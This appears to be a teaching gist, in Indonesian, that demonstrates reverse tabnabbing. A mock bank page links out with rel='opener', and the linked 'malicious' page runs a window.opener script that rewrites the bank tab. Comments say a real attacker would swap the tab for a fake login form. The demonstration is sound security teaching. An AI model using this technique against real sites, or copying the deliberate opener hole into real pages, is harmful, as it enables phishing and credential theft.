Created
December 23, 2025 23:44
-
-
Save Xnuvers007/9da41033b0bca7d31edd4a90725a9614 to your computer and use it in GitHub Desktop.
Reverse Tabnabbing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="id"> | |
| <head> | |
| <title>BANK AMAN - Website Asli</title> | |
| <style> | |
| body { background-color: #e0f2fe; font-family: sans-serif; padding: 50px; text-align: center; } | |
| h1 { color: #0369a1; } | |
| .promo-box { | |
| background: white; padding: 20px; border-radius: 10px; | |
| box-shadow: 0 4px 6px rgba(0,0,0,0.1); display: inline-block; | |
| } | |
| a { | |
| background: #ef4444; color: white; padding: 10px 20px; | |
| text-decoration: none; border-radius: 5px; font-weight: bold; | |
| } | |
| </style> | |
| </head> | |
| <body> | |
| <h1>Selamat Datang di Bank Aman</h1> | |
| <p>Saldo Anda: Rp 100.000.000</p> | |
| <div class="promo-box"> | |
| <h3>Promo Spesial!</h3> | |
| <p>Dapatkan hadiah menarik dari partner kami.</p> | |
| <a href="penyerang.html" target="_blank" rel="opener"> | |
| KLIK UNTUK KLAIM HADIAH >> | |
| </a> | |
| </div> | |
| </body> | |
| </html> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="id"> | |
| <head> | |
| <title>WEBSITE HADIAH (JAHAT)</title> | |
| <style> | |
| body { background-color: #fee2e2; font-family: sans-serif; padding: 50px; text-align: center; } | |
| h1 { color: #b91c1c; } | |
| </style> | |
| </head> | |
| <body> | |
| <h1>SELAMAT! ANDA MENANG!</h1> | |
| <p>Silakan lihat tab sebelah kiri (Tab Bank Anda)...</p> | |
| <p>Kami baru saja membajaknya!</p> | |
| <script> | |
| // INI ADALAH SCRIPT JAHATNYA | |
| // Script ini mengecek apakah ada halaman pembuka (opener) | |
| if (window.opener) { | |
| // Ubah URL halaman ASAL (korban.html) ke halaman lain | |
| // Di dunia nyata, ini akan diarahkan ke halaman Login Palsu (Phishing) | |
| window.opener.document.body.innerHTML = ` | |
| <div style="background:red; color:white; height:100vh; display:flex; justify-content:center; align-items:center; flex-direction:column;"> | |
| <h1 style="font-size:50px">! ANDA TELAH DI-HACK! !</h1> | |
| <p>Halaman ini telah dikontrol oleh Website Jahat.</p> | |
| <input></input> | |
| <p>Bayangkan jika ini adalah form Login Palsu yang meminta password Anda.</p> | |
| </div> | |
| `; | |
| // Atau bisa redirect total: | |
| // window.opener.location = "https://google.com"; | |
| } | |
| </script> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment